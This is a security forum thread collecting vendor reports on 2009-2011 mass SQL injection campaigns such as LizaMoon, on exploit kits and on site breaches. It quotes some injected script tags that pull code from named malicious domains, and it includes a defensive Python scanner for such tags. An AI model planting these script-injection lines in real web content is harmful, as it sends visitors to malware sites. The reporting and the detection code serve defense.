Topic: SQL injection attacks...
« on: July 16, 2009, 02:21:27 »
AplusWebMaster (Global Moderator)

FYI...

(MS Office Web Components) OWC exploits used in SQL injection attacks
- http://isc.sans.org/diary.html?storyid=6811
Last Updated: 2009-07-16 08:38:21 UTC - "... The SQL injection attempt looks very much like the one we've been seeing for months – the attacker blindly tries to inject obfuscated SQL code... they are injecting a script code pointing to f1y .in, which is a known bad domain. This script contains links to two other web sites (www .jatrja .com and js.tongji. linezing .com [DO NOT VISIT]) serving malicious JavaScript that, besides exploits for some older vulnerabilities, also include the exploit for the OWC vulnerability. The exploits end up downloading a Trojan (of course, what else) which currently has pretty bad detection (VT link*) – only 15 AV programs detecting it, luckily, some major AV vendors are there. If you haven't set those killbits** yet, be sure that you do now because the number of sites exploiting this vulnerability will probably rise exponentially soon."
* http://www.virustotal.com/analisis/055757dfc4ffd9a3bc1a53fe965881dfb56268bfc7833968a1b26675376dda0a-1247733262

** http://support.microsoft.com/kb/973472#FixItForMe

- http://blog.trendmicro.com/massive-sql-injection-ensues/
July 17, 2009

« Last Edit: November 10, 2009, 14:43:00 by AplusWebMaster »

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #1 on: July 27, 2009, 15:10:01 »
AplusWebMaster (Global Moderator)

FYI...

MS OWC vuln used in site compromise
- http://securitylabs.websense.com/content/Alerts/3451.aspx
07.27.2009 - "Websense... has discovered that the Center for Defense Information (CDI) Web site has been compromised. The site is injected with a JavaScript code that exploits the latest Microsoft Office Web Components Control vulnerability... The vulnerability is in the Internet Explorer ActiveX control used to display Excel spreadsheets (CVE-2009-1136)... The exploit code pushes a Trojan from hxxp ://vicp .cc/. The Trojan has more than 50% detection*. Note that Microsoft provides a workaround for the problem in their Fixit** program..."

* http://www.virustotal.com/analisis/0ef75757f2f8e8a4ea1aa4288d52eb2deb8b9df804af33da9f0ef3baee60138c-1248724806
File solar.exe received on 2009.07.27 20:00:06 (UTC)
Result: 24/41 (58.54%)

** http://support.microsoft.com/kb/973472#FixItForMe

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1136
Last revised: 07/16/2009
CVSS v2 Base Score: 9.3 (HIGH)

« Last Edit: July 28, 2009, 02:45:23 by AplusWebMaster »

« Reply #2 on: November 10, 2009, 14:45:43 »
AplusWebMaster (Global Moderator)

FYI...

- http://sunbeltblog.blogspot.com/2009/11/3100-vulnerabilities-connected-with-web.html
November 10, 2009 - "If anyone ever needed a great example for the lectures they give friends, relatives or employees about the importance of installing software updates, here it is. Security firm Cenzic* has made public a report documenting 3,100 vulnerabilities that affect the software used on web sites and in browsers! The report included patched and unpatched vulnerabilities. Cenzic, which provides software as a service, said in their report “Web Application Security Trends Report Q1-Q2, 2009” that Cross Site Scripting and SQL Injection vulnerabilities were a factor in half of all web attacks. They said 87 per cent of web applications their researchers looked at "had serious vulnerabilities that could potentially lead to the exposure of sensitive or confidential user information during transactions"..."
* http://www.cenzic.com/resources_reg-not-required_trends/
Q1-Q2 2009
http://www.cenzic.com/downloads/Cenzic_AppSecTrends_Q1-Q2-2009.pdf


« Reply #3 on: February 23, 2010, 08:41:37 »
AplusWebMaster (Global Moderator)

FYI...

Automated SQL injection attacks...
- http://www.darkreading.com/shared/printableArticle.jhtml?articleID=223100129
Feb. 22, 2010 - "SQL injections top plenty of lists as the most prevalent means of attacking front-end Web applications and back-end databases to compromise data... analysis of the Web Hacking Incidents Database* (WHID) shows SQL injections as the top attack vector, making up 19 percent of all security breaches examined by WHID. Similarly, in the "Breach Report for 2010" (PDF) released by 7Safe** earlier this month, a whopping 60 percent of all breach incidents examined involved SQL injections... criminals are increasingly using automated SQL injection attacks powered by botnets to hit vulnerable systems... the purpose of those attacks is really to inject JavaScript redirectors into Web pages so that legitimate Web pages end up redirecting their users to exploit toolkits..."
* http://webappsec.pbworks.com/Web-Hacking-Incident-Database

** http://7safe.com/breach_report/Breach_report_2010.pdf


« Reply #4 on: March 09, 2010, 19:06:18 »
AplusWebMaster (Global Moderator)

FYI...

WordPress injection attack
- http://securitylabs.websense.com/content/Blogs/3577.aspx
03.09.2010 - "... Websense... has been monitoring the latest WordPress injection attack for over 2 weeks and has found over 250,000 injections occurring in the past half month. Moreover, over 37,000 URLs in the wild are still being injected according to our observations... the daily stats go up and down a few times and always end up higher, so we believe the hackers are still continuing their attack... WordPress is so widely used all over the world that every version of it is studied and exploited by hackers, even the latest version (2.9.2, released on December 18, 2009)... The ultimate purpose of the attack is all about making money, as Sophos has already investigated*... These attacks probably happened due to SQL injection via some known and unknown WordPress vulnerabilities... Injection is not the only way for hackers to utilize those vulnerabilities; compromising a site is also a good option. It has often been reported that compromised Web sites are used for Blackhat SEO to push rogue AVs. Novirusthanks has a great analysis here**, and more investigation indicates that the compromise behind the attack is connected to WordPress vulnerabilities... WordPress users should be very familiar with the injection or compromise attack since it has been used frequently in the past. Although WordPress has 2-3 releases every year and has 3 releases planned this year as usual, it has proved to be not enough: we still can see many victimized sites with the latest 2.9.2 installation..."

(More detail and screenshots available at the Websense URL above.)

* http://www.sophos.com/blogs/sophoslabs/?p=8498

** http://blog.novirusthanks.org/2009/11/more-than-100-websites-compromised-for-blackhat-seo-strategy/

« Last Edit: March 09, 2010, 19:10:51 by AplusWebMaster »

« Reply #5 on: November 22, 2010, 11:42:17 »
AplusWebMaster (Global Moderator)

FYI...

Websense in error blaming WordPress ...
- http://www.whitefirdesign.com/news/2010/11/15/websense-threat-report-repeats-false-claims-of-wordpress-hackings/
November 15, 2010 - "In Websense’s 2010 Threat Report they listed WordPress Attacks as one of the significant events of the year**... The hacks they refer to were actually hacks that targeted hosting providers that would allow malicious code to be added to websites hosted with the provider whether they were running WordPress, other software, or no software at all. In most of the hacks the malicious code was placed in all files that had a .php extension. WordPress, by the nature of being the most popular web software, was the most often affected, but all web software that have files with a .php extension were also affected. In other cases the hacks targeted database fields specific to WordPress, but they could have affected any other software that utilized a database if the hacker had chosen to target them instead of WordPress. Websense is not alone in making these false claims; other supposed security experts also made similar claims and some hosting providers have attempted to lay blame on WordPress. Network Solutions was the only one to later apologize for blaming WordPress...*"
* http://blog.networksolutions.com/2010/wordpress-is-not-the-issue/

** http://www.websense.com/content/threat-report-2010-wordpress.aspx


« Reply #6 on: March 28, 2011, 04:53:31 »
AplusWebMaster (Global Moderator)

FYI...

MySQL and Sun hacked...
- http://nakedsecurity.sophos.com/2011/03/27/mysql-com-and-sun-hacked-through-sql-injection/
March 27, 2011 - "Proving that no website is ever truly secure, it is being reported that MySQL.com has succumbed to an SQL injection attack. It was first disclosed to the Full Disclosure mailing list*... Several accounts had passwords like "qa". The irony is that they weren't compromised by means of their ridiculously simple passwords, but rather flaws in the implementation of their site... MySQL's parent company Sun/Oracle has also been attacked**. Both tables and emails were dumped from their databases, but no passwords. It does not appear to be a vulnerability in the MySQL software, but rather flaws in the implementation of their websites... It was noted on Twitter that mysql .com is also subject to an XSS (cross-site scripting) vulnerability that was reported in January 2011 and has not been remedied."  
*  http://seclists.org/fulldisclosure/2011/Mar/309?utm_source=twitterfeed&utm_medium=twitter

** http://tinkode27.baywords.com/sun-com-sun-mycrosystems-vulnerable-sql-injection/

- http://blog.sucuri.net/2011/03/mysql-com-compromised.html
March 27, 2011 - "... If you have an account on MySQL.com, we recommend changing your passwords ASAP..."

- https://www.computerworld.com/s/article/9215249/MySQL_Web_site_falls_victim_to_SQL_injection_attack
March 28, 2011

« Last Edit: March 28, 2011, 05:56:26 by AplusWebMaster »

« Reply #7 on: March 29, 2011, 15:33:25 »
AplusWebMaster (Global Moderator)

FYI...

SQL mass injection hits over 28,000 URLs including iTunes
- http://community.websense.com/blogs/securitylabs/archive/2011/03/29/lizamoon-mass-injection-28000-urls-including-itunes.aspx
29 Mar 2011 - "Websense... has identified a new malicious mass-injection campaign that we call LizaMoon...
The LizaMoon mass-injection is a SQL injection attack...
< script src=hxxp ://lizamoon .com/ur.php></script >
According to a Google Search, over 28,000 URLs have been compromised. This includes several iTunes URLs... The way iTunes works is that it downloads RSS/XML feeds from the publisher to update the podcast and list of available episodes. We believe that these RSS/XML feeds have been compromised with the injected code. The good thing is that iTunes encodes the script tags, which means that the script doesn't execute on the user's computer. So good job, Apple. The URL that is injected is unavailable right now, but the server is still up and running, so that could change at any time. While it was up, the script contained simple JavaScript code that redirected the user to a well-known Rogue AV site:
 hxxp ://defender-uqko .in. That site is also unavailable right now, so we don't have the actual binary analysis information available yet. The domain lizamoon .com was registered three days ago with clearly fake information... We'll keep monitoring this mass-injection attack and provide updated information as it's available."
(Screenshots and more detail available at the Websense URL above.)
___

urgent block: lizamoon .com and defender-uqko .in
- http://www.malwaredomains.com/wordpress/?p=1728
March 30th, 2011 - "Websense... is reporting a mass sql injection attack of over 28000 sites... We’ll be adding this site (and defender-uqko .in) on tonight’s update, but you shouldn’t wait... add these sites to your blocklists ASAP."
___

- http://centralops.net/co/DomainDossier.aspx
Registrar: BIZCN.COM, INC...
Created: 2011-03-25 ...
91.213.29.182
organisation: ORG-IM15-RIPE
org-name: Info-Media Ltd
org-type: OTHER
address: Rastochnaya 31
address: Yekaterinburg, 620050, Russia
country: RU
... Information related to '91.213.29.0/24 AS51247...
- http://google.com/safebrowsing/diagnostic?site=AS:51247
"... appeared to function as intermediaries for the infection of 60 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days..."

« Last Edit: March 30, 2011, 12:19:12 by AplusWebMaster »

« Reply #8 on: March 31, 2011, 02:26:40 »
AplusWebMaster (Global Moderator)

FYI...

380,000 226,000 28000 URLs whacked...
- http://community.websense.com/blogs/securitylabs/archive/2011/03/29/lizamoon-mass-injection-28000-urls-including-itunes.aspx
2011-03-31 01:58
"UPDATE1: A Google Search now returns over 226,000 results. Do note that this is a count of unique URLs, not infected hosts. Still, it makes it one of the bigger mass-injection attacks we have ever seen.
UPDATE2: We have been monitoring the attack since it came out and noticed that the number of the compromised URLs is still increasing, 380,000 URLs so far, moreover, more domains started to be involved except for lizamoon .com."

« Last Edit: March 31, 2011, 15:15:36 by AplusWebMaster »

« Reply #9 on: April 01, 2011, 02:11:37 »
AplusWebMaster (Global Moderator)

FYI...

Update on LizaMoon mass-injection...
- http://community.websense.com/blogs/securitylabs/archive/2011/03/31/update-on-lizamoon-mass-injection.aspx
31 Mar 2011 - "The LizaMoon mass-injection campaign is still ongoing and more than 500,000 URLs have a script link to lizamoon .com according to Google Search results. We have also been able to identify several other URLs that are injected in the exact same way, so the attack is even bigger than we originally thought. All in all, a Google Search reveals over 1,500,000 URLs that have a link with the same URL structure as the initial attack. Google Search results aren't always great indicators of how prevalent or widespread an attack is as it counts each unique URL, not domain or site, but it does give some indication of the scope of the problem if you look at how the numbers go up or down... All the code does is a redirect to a rogue AV site..."
(Screenshots and more detail at the Websense URL above.)

- http://isc.sans.edu/diary.html?storyid=10642
Last Updated: 2011-04-01 21:49:17 UTC - "... There doesn't seem to be anything particularly new about the infection mechanism (aside of the scope of its success) and the injection itself only inserts a random snippet of HTML to redirect victims to a rogue AV site that tells the user they are infected. One of the domains implicated in this attack was registered in October and showed up on the radar in December, so it appears the preparation of this attack has taken some time... Infected sites tend to use the same URL structure including a file "ur.php". It appears this is only affecting sites using Microsoft SQL Server 2003/2005. Defense against your sites getting infected is the standard things we ought to be doing anyway in regards to SQL injection (i.e. filter input for control characters, whitelist if possible, blacklist if not). Webserver administrators should also be checking for sudden appearance of files in their httpdocs directory..."
- http://isc.sans.edu/tag.html?tag=sql%20injection

- http://www.theregister.co.uk/2011/03/31/lizamoon_mass_injection_attack/
"... The count only looks at unique URLs, not infected hosts, a more meaningful metric. Even so the assault still counts as among the most widespread mass-injection attacks on record..."

- http://blog.trendmicro.com/lizamoon-etc-sql-injection-attack-still-on-going/
March 31, 2011 - "... monitoring a still-ongoing mass compromise involving a great number of websites. The compromised sites have been injected with a malicious script that triggers redirects to certain URLs that lead to malware such as FAKEAV... We saw compromised websites related to astronomy, clubs, hospitals, sports, funeral homes, electronics, and others..."

- http://ddanchev.blogspot.com/2011/03/dissecting-massive-sql-injection-attack.html
March 31, 2011 - "... the used domains are all responding to the same IPs, including the portfolios of scareware domains, which the cybercriminals naturally rotate on a periodic basis... Upon successful redirection, the campaign attempts to load the scareware domains..."
(More detail at the ddanchev.blogspot URL above.)
- http://www.virustotal.com/file-scan/report.html?id=cd902b92042435c2d70d4bf59acc2de8229bfc367626961f76c03f75dcd7e95c-1301586582
File name: freesystemscan.exe
Submission date: 2011-03-31 15:49:42 (UTC)
Current status: finished
Result: 9/41 (22.0%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan/report.html?id=cd902b92042435c2d70d4bf59acc2de8229bfc367626961f76c03f75dcd7e95c-1301722562
File name: a.exe
Submission date: 2011-04-02 05:36:02 (UTC)
Result: 24/42 (57.1%)
___

Lizamoon SQL Injection: 7 Months Old and Counting
- http://blog.scansafe.com/journal/2011/4/1/lizamoon-sql-injection-7-months-old-and-counting.html
April 1, 2011 - "...part of a continuous SQLi attack that spans the past seven months... 40+ malware domains... have been used in the ongoing injection attacks..."

- http://nakedsecurity.sophos.com/2011/04/01/lizamoon-sql-injection/
April 1, 2011

« Last Edit: April 05, 2011, 04:04:49 by AplusWebMaster »

« Reply #10 on: April 05, 2011, 04:06:54 »
AplusWebMaster (Global Moderator)

FYI...

- http://blog.sucuri.net/2011/04/lizamoon-mass-sql-injection-ur-php-updates.html
April 4, 2011 - "... good way to check if your site is infected, is by using our malware scanner*. If you see IIS:4 as the malware code, you know what happened..."
* http://sitecheck.sucuri.net/scanner/


« Reply #11 on: April 07, 2011, 08:38:40 »
AplusWebMaster (Global Moderator)

FYI...

Database Injection on Joomla Websites...
- http://blog.sucuri.net/2011/04/database-injection-on-joomla-sites-yourstatscounter-cz-cc.html
April 6, 2011 - "It seems that a good amount of Joomla sites are being infected with malware from the infamous “.cc” domains. All of the hacked sites have the malicious code injected directly into their databases (SQL injection), via an unknown source (probably a vulnerable extension, but we are still researching the entry point). This is what is being added to the infected sites (at the top of every post in the jos_content table):
    < script type="text/javascript" src="http://yourstatscounter.co.cc/statscounter307.js" >< /script >
There are many other domains being used in this attack, including:
    http ://faststatscounter.co.cc/statscounter01935 .js
    http ://yourstatscounter.cz.cc/statscounter301 .js
    http ://yourstatscounter.co.cc/statscounter307 .js
    http ://easystatscounter.co.cc/statscounter12 .js
    http ://supergoogleanalytics.co.cc/
Note that those are different from the Lizamoon SQL injection of a few days ago. The Lizamoon was targeting IIS/ASP.net sites, while this one seems to be targeted only to Joomla sites.... site might be hacked(?), check it using our malware scanner*..."
* http://sitecheck.sucuri.net/

- http://google.com/safebrowsing/diagnostic?site=yourstatscounter.cz.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=faststatscounter.co.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=yourstatscounter.co.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=easystatscounter.co.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=supergoogleanalytics.co.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
___

Thousands of osCommerce sites infected...
- http://blog.sucuri.net/2011/04/continuing-attacks-against-oscommerce-khcol-com.html
April 5, 2011 - "... we are seeing thousands of osCommerce sites infected with a malware pointing to http ://khcol .com...
> Update 1: Google already blacklisted more than 1 thousand sites because of this malware. We have identified a lot more already, so this number should grow very soon...
> Update 2: Other domains being used in this attack: solomon-xl .cz.cc, thescannerantiv .com, searchableantiv .com, www1 .checker-network-hard .cz.cc and many others."

- http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=khcol.com/
"... last time suspicious content was found on this site was on 2011-04-08... Malicious software includes 2861 scripting exploit(s), 64 trojan(s), 1 exploit(s)...  Over the past 90 days, khcolm .com appeared to function as an intermediary for the infection of 1149 site(s)... This site was hosted on 1 network(s) including AS17408..."
- http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=AS:17408
"... over the past 90 days, 50 site(s)... served content that resulted in malicious software being downloaded and installed without user consent... The last time Google tested a site on this network was on 2011-04-07, and the last time suspicious content was found was on 2011-04-07... we found 5 site(s) on this network... that appeared to function as intermediaries for the infection of 1152 other site(s)..."

- http://google.com/safebrowsing/diagnostic?site=solomon-xl.cz.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=thescannerantiv.com/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=searchableantiv.com/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=checker-network-hard.cz.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."

« Last Edit: April 08, 2011, 13:02:27 by AplusWebMaster »

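A defender-side check for the two injection shapes reported in this thread: the LizaMoon-style external script link with the "ur.php" path that the ISC diary singles out, and the script tag stored at the top of CMS rows (the Joomla jos_content case above). This is an added example, not code from the thread or from Websense, Sucuri or ISC; the sample rows, the ".invalid" domains and the allow-list are constructed.

```python
"""Detect injected external <script> tags in stored site content.

Added example, not code from the original thread. It scans text rows
(CMS post bodies, RSS/XML items) for <script src=...> tags whose host is
outside the site's own allow-list, distinguishes raw tags from HTML-escaped
ones (the iTunes case, which do not execute), and marks the "ur.php" URL
structure the ISC diary describes. Sample rows and domains are constructed.
"""
import html
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Matches <script ... src=VALUE, tolerating missing quotes and odd spacing,
# which injected tags often have (e.g. <script src=http://host/ur.php>).
SCRIPT_SRC_RE = re.compile(
    r"<\s*script\b[^>]*?\bsrc\s*=\s*['\"]?\s*([^'\"\s>]+)", re.IGNORECASE)

# Path markers the thread associates with the mass-injection campaign.
SUSPICIOUS_PATH_MARKERS = ("ur.php",)


@dataclass(frozen=True)
class Finding:
    row_id: str
    src: str
    host: str
    executable: bool     # True if the tag is stored raw; False if HTML-escaped
    known_pattern: bool  # True if the path matches a marker above


def src_host(src: str):
    """Return the lowercase host of a script src, or None for same-origin paths."""
    if src.startswith("//"):
        src = "http:" + src          # protocol-relative still loads from a remote host
    elif "://" not in src:
        return None                  # relative path: served by the site itself
    return (urlparse(src).hostname or "").lower() or None


def scan_row(row_id: str, content: str, allowed_hosts):
    """Return Findings for external script tags in one content row."""
    allowed = {h.lower() for h in allowed_hosts}
    raw_srcs = set(SCRIPT_SRC_RE.findall(content))
    # Unescape once so &lt;script&gt; stored by a feed reader is still reported.
    all_srcs = set(SCRIPT_SRC_RE.findall(html.unescape(content)))
    findings = []
    for src in sorted(all_srcs):
        host = src_host(src)
        if host is None or host in allowed:
            continue
        path = urlparse(src if "://" in src else "http:" + src).path.lower()
        findings.append(Finding(
            row_id=row_id, src=src, host=host,
            executable=src in raw_srcs,
            known_pattern=any(path.endswith(m) for m in SUSPICIOUS_PATH_MARKERS)))
    return findings


def scan_rows(rows, allowed_hosts):
    """rows: iterable of (row_id, content). Returns all findings across rows."""
    out = []
    for row_id, content in rows:
        out.extend(scan_row(row_id, content, allowed_hosts))
    return out


# Constructed sample rows mirroring the patterns described in the thread.
SAMPLE_ROWS = [
    ("post-1", '<p>Hello</p><script src="/js/site.js"></script>'),
    ("post-2", "<script src=http://injected-host.invalid/ur.php></script><p>News</p>"),
    ("item-3", "&lt;script src=http://injected-host.invalid/ur.php&gt;&lt;/script&gt; episode notes"),
    ("post-4", '<script type="text/javascript" src="http://statscounter-lookalike.invalid/statscounter307.js"></script><p>Article</p>'),
]
ALLOWED_HOSTS = {"www.example-site.invalid", "cdn.example-site.invalid"}

if __name__ == "__main__":
    for f in scan_rows(SAMPLE_ROWS, ALLOWED_HOSTS):
        state = "EXECUTABLE" if f.executable else "escaped/inert"
        flag = " [known ur.php pattern]" if f.known_pattern else ""
        print(f"{f.row_id}: {f.src} ({state}){flag}")
```

Run it against a dump of the content table or the feed files rather than the rendered pages, since the injected tag is what sits in the database; escaped hits still indicate the row was written by the attacker even though the browser will not run them.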
« Reply #12 on: April 12, 2011, 08:28:01 »
AplusWebMaster (Global Moderator)

FYI...

Barracuda Networks - hacked via a SQL injection attack
- http://www.darkreading.com/taxonomy/index/printarticle/id/229401358
Apr 11, 2011 - "... Barracuda Networks*... confirmed that its corporate website indeed had been hacked via an SQL injection attack, and names and emails of customers and partners, including some hashes of salted passwords, exposed..."
* http://blog.barracuda.com/pmblog/index.php/2011/04/12/waf-importance/


« Reply #13 on: April 19, 2011, 16:28:49 »
AplusWebMaster (Global Moderator)

FYI...

Mass Injections Leading to g01pack Exploit Kit
- http://community.websense.com/blogs/securitylabs/archive/2011/04/19/Mass-Injections-Leading-to-g01pack-Exploit-Kit.aspx
19 Apr 2011 - "... detected a new injection attack which leads to an obscure Web attack kit. The injection has three phases... The first phase of the attack is a typical vector** for exploit kits to drive traffic to their sites: script injections.  Script HTML code is put on legitimate Web sites meant to drive traffic to the attack kits without the victim's knowledge. In this case, legitimate sites are injected with malicious JavaScript... In the second phase, this script injection then pulls obfuscated content from another site. The obfuscated content creates an iframe that is used to pull content from the exploit kit site... The exploit kit can basically be described as a drive-by download site used in the third and final phase of this attack. Its intent is to scan, attack, and run malicious code on the visitor's computer. If -one- of the exploit kit's Web attacks is successful, it could put malware on a victim's computer that is meant to remotely control the computer. The binary that this kit tries to run on target computers has low detection* as a Rogue AV installation. As is typical, the exploit kit's Web attack code is obfuscated... We were able to access the admin panel and confirm that this site is hosting an installation of g01pack malware tool..."
* http://www.virustotal.com/file-scan/report.html?id=3964200e5891702fc64f57b0db9e4488a65e4793c27fda8f869f6fded35756a1-1303197157
File name: JwWeagugDQKT.exe
Submission date: 2011-04-19 07:12:37 (UTC)
Result: 15/42 (35.7%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan/report.html?id=3964200e5891702fc64f57b0db9e4488a65e4793c27fda8f869f6fded35756a1-1303729645
File name: JwWeagugDQKT.exe
Submission date: 2011-04-25 11:07:25 (UTC)
Result: 30/40 (75.0%)

** http://community.websense.com/blogs/securitylabs/archive/2011/03/29/lizamoon-mass-injection-28000-urls-including-itunes.aspx
29 Mar 2011

« Last Edit: May 07, 2011, 02:41:45 by AplusWebMaster »

« Reply #14 on: June 19, 2011, 12:48:33 »
AplusWebMaster (Global Moderator)

Online -everything- hacked, or so it seems.

- http://www.reuters.com/article/2011/06/19/us-sega-hackers-idUSL3E7HJ01520110619
Jun 19, 2011 - "... Sega Corp said on Sunday that information belonging to 1.3 million customers has been stolen from its database, the latest in a rash of global cyber attacks against video game companies. Names, birth dates, e-mail addresses and encrypted passwords of users of Sega Pass online network members had been compromised, Sega said in a statement, though payment data such as credit card numbers was safe. Sega Pass had been shut down... The attack against Sega, a division of Sega Sammy Holdings that makes game software such as Sonic the Hedgehog as well as slot machines, follows other recent significant breaches including Citigroup, which said over 360,000 accounts were hit in May, and the International Monetary Fund... surrounding the recent round of video game breaches paled compared to what PlayStation maker Sony Corp experienced following two high-profile attacks that surfaced in April. Those breaches led to the theft of account data for more than 100 million customers, making it the largest ever hacking of data outside the financial services industry..."

- http://www.theregister.co.uk/2011/06/20/sega_onemillion_hacked/
20 June 2011 - "... if the same login information is used for other websites or services, they need to be changed immediately..."

- http://www.fortiguard.com/reports/roundup_06_17_2011.html
June 17 2011

« Last Edit: June 19, 2011, 20:40:55 by AplusWebMaster »
